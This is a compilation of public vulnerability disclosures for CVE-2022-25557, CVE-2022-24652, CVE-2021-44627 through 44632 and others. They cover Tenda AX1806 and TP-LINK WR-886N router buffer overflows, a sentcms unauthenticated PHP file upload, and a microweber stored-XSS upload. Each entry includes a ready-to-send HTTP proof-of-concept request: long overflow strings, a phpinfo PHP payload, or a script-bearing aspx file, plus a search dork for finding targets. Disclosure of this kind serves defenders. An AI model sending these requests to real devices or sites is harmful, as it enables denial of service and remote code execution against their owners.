Tenda AX1806 v1.0.0.1 was discovered to contain a heap overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the urls parameter.

CVE-2022-25557: IoT-CVE/Tenda/AX1806/11 at main · sec-bin/IoT-CVE

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow in the function fromSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the serverName parameter.

Affect device: Tenda Router AX1806 v1.0.0.1(https://www.tenda.com.cn/download/detail-3306.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetDDNSCfg` page which influences the lastest version of Tenda Router AX1806 v1.0.0.1: https://www.tenda.com.cn/download/detail-3306.html

There is a stack overflow vulnerability in the `formSetSysToolDDNS` function.

The `v3` variable is obtained directly from the http request parameter `serverName`.

This function uses strcpy to copy the **variable v3 to the stack variable s2** without any sercuity check.

![image-20220208222338204](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX1806/5/image/1.png)

So attacker can construct **a long serverName parameter** in the http request,which causes stack overflow.

**POC**

Poc of Denial of Service(DoS):

POST /goform/SetDDNSCfg HTTP/1.1
Host: 192.168.2.1
Connection: close
Accept: text/plain, \*/\*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.2.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 2747

serverName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-25548: IoT-CVE/Tenda/AX1806/5 at main · sec-bin/IoT-CVE

sentcms 4.0.x allows remote attackers to cause arbitrary file uploads through an unauthorized file upload interface, resulting in php code execution in /admin/upload/upload.

****Google Dork:****

sentcms

****Exp methods :****

Vulnerability description: Arbitrary file uploads are possible without login

Vulnerability Location.

> /user/upload/upload
> 
> /admin/upload/upload

Both of the above interfaces are vulnerable to arbitrary file uploads

If the following page appears, a vulnerability exists

![image-20220206032920568](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032920568.png)

![image-20220206032944553](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220206032944553.png)

**Vulnerability recurrence：**

Modify the url at the pink arrow to be the home site, then post the package, and the successful upload will return the phpinfo connection

If you can’t upload, modify the time of the post package.

> The requested interface can be either “/user/upload/upload” or “/admin/upload/upload”

![image-20220204021956537](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021956537.png)

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  

POST /user/upload/upload HTTP/1.1  
Host: target.com  
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728  
Content-Length: 894  
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz  
Accept: \*/\*  
Origin: https://info.ziwugu.vip/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6  
Connection: close  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="id"  
  
WU\_FILE\_0  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="name"  
  
test.jpg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="type"  
  
image/jpeg  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="lastModifiedDate"  
  
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="size"  
  
164264  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz  
Content-Disposition: form-data; name="file"; filename="test.php"  
Content-Type: image/jpeg  
  
JFIF  
<?php phpinfo();?>  
  
\------WebKitFormBoundaryrhx2kYAMYDqoTThz--  

![image-20220204021215525](https://hanayuzu-images.oss-cn-hangzhou.aliyuncs.com/images/image-20220204021215525.png)

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hanayuzu'Blog！

CVE-2022-24652: Sentcms任意文件上传漏洞

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/upgrade_info feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/upgrade\_info interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/upgrade\_info interface.

1.  An interface `/cloud_config/router_post/upgrade_info` is registered first in the upgradeInfoRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/upgradeInfoRegister/upgradeInfoRegister1.png)
2.  In the handler, the v7 variable is the `version` field in the packet, and the v9 variable is the `release_date` field in the packet,and the v11 variable is the `download_url` field in the packet,and the v16 variable is the `release_log` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/upgradeInfoRegister/upgradeInfoRegister2.png)

**poc**

    POST /cloud_config/router_post/cloud_reply/upgrade_info HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    Type=1&version=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&release_date=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&download_url=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&release_log=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44632: IoT_CVE/886N/upgradeInfoRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/reset_cloud_pwd feature, which allows malicous users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/reset\_cloud\_pwd interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/reset\_cloud\_pwd interface.

1.  An interface `/cloud_config/router_post/reset_cloud_pwd` is registered first in the resetCloudPwdRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/resetCloudPwdRegister/resetCloudPwdRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet,and the v11 variable is the `verify_code` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/resetCloudPwdRegister/resetCloudPwdRegister2.png)

**poc**

    POST /cloud_config/router_post/reset_cloud_pwd HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&verify_code=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&account_type=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44631: IoT_CVE/886N/resetCloudPwdRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/modify_account_pwd feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/modify\_account\_pwd interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/modify\_account\_pwd interface.

1.  An interface `/cloud_config/router_post/modify_account_pwd` is registered first in the modifyAccPwdRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/modifyAccPwdRegister/modifyAccPwdRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `old_pwd` field in the packet,and the v11 variable is the `new_pwd` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/modifyAccPwdRegister/modifyAccPwdRegister2.png)

**poc**

    POST /cloud_config/router_post/modify_account_pwd HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&old_pwd=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&new_pwd=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44630: IoT_CVE/886N/modifyAccPwdRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerabilitiy exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/register feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/register interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/register interface.

1.  An interface `/cloud_config/router_post/register` is registered first in the registerRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/registerRegister/registerRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet,and the v11 variable is the `verify_code` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/registerRegister/registerRegister2.png)

**poc**

    POST /cloud_config/router_post/register HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&verify_code=cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc&account_type=ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44629: IoT_CVE/886N/registerRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerabiltiy exists in TP-LINK WR-886N 20190826 2.3.8 in thee /cloud_config/router_post/login feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/login interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/login interface.

1.  An interface `/cloud_config/router_post/login` is registered first in the loginRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `password` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/loginRegister/loginRegister2.png)

**poc**

    POST /cloud_config/router_post/login HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44628: IoT_CVE/886N/loginRegister at main · Yu3H0/IoT_CVE

A Buffer Overflow vulnerability exists in TP-LINK WR-886N 20190826 2.3.8 in the /cloud_config/router_post/get_reset_pwd_veirfy_code feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.

**TP-LINK WR-886N Vulnerability**

This vulnerability is on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8

**Vulnerability description**

There is a buffer overflow vulnerability on the /cloud\_config/router\_post/get\_reset\_pwd\_veirfy\_code interface.

1.  An interface `/cloud_config/router_post/get_reset_pwd_veirfy_code` is registered first in the getResetVeriRegister function. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister1.png)
2.  In the handler, the v7 variable is the `username` field in the packet, and the v9 variable is the `account_type` field in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem. ![](https://github.com/Yu3H0/IoT_CVE/raw/main/886N/getResetVeriRegister/getResetVeriRegister2.png)

**poc**

    POST /cloud_config/router_post/get_reset_pwd_veirfy_code HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 717
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded;
    Accept: */*
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/index.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&account_type=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    

**Acknowledgment**

Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi'anxin Group.

CVE-2021-44627: IoT_CVE/886N/getResetVeriRegister at main · Yu3H0/IoT_CVE

Unrestricted file upload leads to stored XSS in GitHub repository microweber/microweber prior to 1.1.12.

**Description**

A user can bypass checking and upload `.aspx` file which lead to stored XSS.

**Proof of Concept**

*   Log in as admin: https://demo.microweber.org/demo/admin/
*   Go to Websites > Edit a page.
*   Under **Pictures**, choose **Add files**
*   Instead of uploading a normal picture, use the below request to upload an `aspx` file.

\-- The request to upload:

    POST /demo/plupload HTTP/1.1
    Host: demo.microweber.org
    Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
    Content-Length: 533
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
    X-Requested-With: XMLHttpRequest
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.microweber.org
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.microweber.org/demo/admin/page/24/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="name"
    
    xss.aspx
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunk"
    
    0
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="chunks"
    
    1
    ------WebKitFormBoundary7ACkSBriVfqdfw4D
    Content-Disposition: form-data; name="file"; filename="blob"
    Content-Type: text/html
    
    <html>
    <script>alert(document.domain)</script>
    </html>
